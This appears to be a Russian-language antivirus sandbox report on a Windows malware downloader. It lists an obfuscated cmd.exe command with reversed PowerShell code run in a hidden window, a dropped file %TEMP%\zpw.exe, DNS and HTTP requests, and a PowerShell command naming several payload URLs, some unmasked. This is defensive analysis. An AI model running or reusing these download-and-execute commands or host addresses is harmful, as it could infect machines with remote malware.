Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe /V/C"set obxM= }}{hctac}}kaerb;Hij$ ssecorP-tratS;)Hij$(elifotevas.YAY$;)ydoBesnopser.hUN$(etirw.YAY$;1 = epyt.YAY$;)(nepo.YAY${ )'*ZM*' ekil- txetesnopser...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\zpw.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://ap###hip.com/cppe1M
- http://ad####matters.org/3ciG
UDP
- DNS ASK ap###hip.com
- DNS ASK ad####matters.org
- DNS ASK bb####ege.org.in
- DNS ASK am#####nt.nichost.ru
- DNS ASK ad#####-ayapel.com.co
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe /V/C"set obxM= }}{hctac}}kaerb;Hij$ ssecorP-tratS;)Hij$(elifotevas.YAY$;)ydoBesnopser.hUN$(etirw.YAY$;1 = epyt.YAY$;)(nepo.YAY${ )'*ZM*' ekil- txetesnopser...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set obxM= }}{hctac}}kaerb;Hij$ ssecorP-tratS;)Hij$(elifotevas.YAY$;)ydoBesnopser.hUN$(etirw.YAY$;1 = epyt.YAY$;)(nepo.YAY${ )'*ZM*' ekil- txetesnopser.hUN$( fI;)(dnes.hUN$;...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "powershell $wLI='Tzd';$uuv='http://ap###hip.com/cppe1M@http://advicematters.org/3ciG@http://bbcollege.org.in/UFda@http://amerpoint.nichost.ru/YPjEZy7@http://admonpc-ayapel.com.co/fUu8'.Split('...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =Tzd
